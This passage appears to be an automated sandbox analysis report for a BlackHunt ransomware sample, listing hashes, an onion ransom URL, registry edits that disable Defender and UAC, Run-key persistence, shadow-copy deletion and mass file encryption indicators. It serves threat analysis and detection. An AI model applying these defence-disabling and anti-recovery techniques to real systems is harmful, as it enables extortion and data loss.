Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
166s -
max time network
61s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe
Resource
win10v2004-20231222-en
General
-
Target
f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe
-
Size
707KB
-
MD5
2bd5a24ab1a18c115c5f47dc7075e248
-
SHA1
e4d25af6bf6464cac50192949fd4a131629e3623
-
SHA256
f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4
-
SHA512
830d09a9624cd5eb5029226f16985ce37968a0a621ed9147a569377d6477b453e63fafaa639f22c26616b1ffeb6f4c70812df1010178025b04272a5fbe6ac54a
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1q8kvnh:6uaTmkZJ+naie5OTamgEoKxLWpah
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1564 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2488 bcdedit.exe 1740 bcdedit.exe -
Renames multiple (2065) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1776 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\Q: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\P: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\A: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\L: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\B: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\M: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\E: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\H: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\R: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\X: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\N: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\U: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\J: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\K: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\T: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\I: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\O: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\G: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\Z: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\S: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened (read-only) \??\V: f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\#BlackHunt_ReadMe.txt f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#BlackHunt_Private.key f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_Private.key f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_SelectionSubpicture.png f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#BlackHunt_ReadMe.txt f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\7-Zip\Lang\tt.txt f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\DVD Maker\audiodepthconverter.ax f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Monrovia f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.RSA f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\PYCC.pf f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jre7\lib\sound.properties f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Ushuaia f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sao_Paulo f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_ButtonGraphic.png f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\Java\jre7\bin\server\#BlackHunt_ReadMe.hta f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\#BlackHunt_Private.key f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\#BlackHunt_ReadMe.hta f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha2.png f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#BlackHunt_ReadMe.txt f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-execution.xml_hidden f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\#BlackHunt_ReadMe.hta f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\#BlackHunt_Private.key f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\#BlackHunt_ReadMe.txt f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Caracas f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\#BlackHunt_ReadMe.hta f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#BlackHunt_ReadMe.hta f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\#BlackHunt_Private.key f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#BlackHunt_ReadMe.txt f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Dot.png f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chuuk f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\sports_disc_mask.png f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sa.jar f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#BlackHunt_ReadMe.txt f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Asuncion f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG_PAL.wmv f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#BlackHunt_ReadMe.txt f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#BlackHunt_Private.key f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#BlackHunt_ReadMe.hta f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_extractor\#BlackHunt_ReadMe.hta f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\1047x576black.png f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_ja_4.4.0.v20140623020002.jar f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\#BlackHunt_ReadMe.txt f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 672 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2248 vssadmin.exe 2252 vssadmin.exe 1704 vssadmin.exe 3036 vssadmin.exe 1664 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe Token: SeRestorePrivilege 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe Token: SeBackupPrivilege 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe Token: SeTakeOwnershipPrivilege 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe Token: SeAuditPrivilege 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe Token: SeSecurityPrivilege 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe Token: SeIncBasePriorityPrivilege 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe Token: SeBackupPrivilege 1964 vssvc.exe Token: SeRestorePrivilege 1964 vssvc.exe Token: SeAuditPrivilege 1964 vssvc.exe Token: SeBackupPrivilege 1980 wbengine.exe Token: SeRestorePrivilege 1980 wbengine.exe Token: SeSecurityPrivilege 1980 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2780 wrote to memory of 2068 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 31 PID 2780 wrote to memory of 2068 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 31 PID 2780 wrote to memory of 2068 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 31 PID 2780 wrote to memory of 2068 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 31 PID 2780 wrote to memory of 2612 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 33 PID 2780 wrote to memory of 2612 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 33 PID 2780 wrote to memory of 2612 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 33 PID 2780 wrote to memory of 2612 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 33 PID 2780 wrote to memory of 2136 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 35 PID 2780 wrote to memory of 2136 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 35 PID 2780 wrote to memory of 2136 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 35 PID 2780 wrote to memory of 2136 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 35 PID 2780 wrote to memory of 2876 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 36 PID 2780 wrote to memory of 2876 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 36 PID 2780 wrote to memory of 2876 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 36 PID 2780 wrote to memory of 2876 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 36 PID 2780 wrote to memory of 2632 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 39 PID 2780 wrote to memory of 2632 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 39 PID 2780 wrote to memory of 2632 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 39 PID 2780 wrote to memory of 2632 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 39 PID 2068 wrote to memory of 2592 2068 cmd.exe 42 PID 2068 wrote to memory of 2592 2068 cmd.exe 42 PID 2068 wrote to memory of 2592 2068 cmd.exe 42 PID 2612 wrote to memory of 2608 2612 cmd.exe 41 PID 2612 wrote to memory of 2608 2612 cmd.exe 41 PID 2612 wrote to memory of 2608 2612 cmd.exe 41 PID 2780 wrote to memory of 2696 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 43 PID 2780 wrote to memory of 2696 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 43 PID 2780 wrote to memory of 2696 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 43 PID 2780 wrote to memory of 2696 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 43 PID 2780 wrote to memory of 1524 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 45 PID 2780 wrote to memory of 1524 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 45 PID 2780 wrote to memory of 1524 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 45 PID 2780 wrote to memory of 1524 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 45 PID 2876 wrote to memory of 1940 2876 cmd.exe 44 PID 2876 wrote to memory of 1940 2876 cmd.exe 44 PID 2876 wrote to memory of 1940 2876 cmd.exe 44 PID 2780 wrote to memory of 2504 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 47 PID 2780 wrote to memory of 2504 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 47 PID 2780 wrote to memory of 2504 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 47 PID 2780 wrote to memory of 2504 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 47 PID 2632 wrote to memory of 1748 2632 cmd.exe 48 PID 2632 wrote to memory of 1748 2632 cmd.exe 48 PID 2632 wrote to memory of 1748 2632 cmd.exe 48 PID 2136 wrote to memory of 2132 2136 cmd.exe 49 PID 2136 wrote to memory of 2132 2136 cmd.exe 49 PID 2136 wrote to memory of 2132 2136 cmd.exe 49 PID 2780 wrote to memory of 1984 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 50 PID 2780 wrote to memory of 1984 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 50 PID 2780 wrote to memory of 1984 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 50 PID 2780 wrote to memory of 1984 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 50 PID 2780 wrote to memory of 2204 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 53 PID 2780 wrote to memory of 2204 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 53 PID 2780 wrote to memory of 2204 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 53 PID 2780 wrote to memory of 2204 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 53 PID 2780 wrote to memory of 980 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 55 PID 2780 wrote to memory of 980 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 55 PID 2780 wrote to memory of 980 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 55 PID 2780 wrote to memory of 980 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 55 PID 2780 wrote to memory of 1488 2780 f6beb4d776b2d8bdae01fd9adb00c7ef9c5f4583dade9b006426acbf5790cdd4.exe 57 PID 2780 wrote to memory of 1488 2780 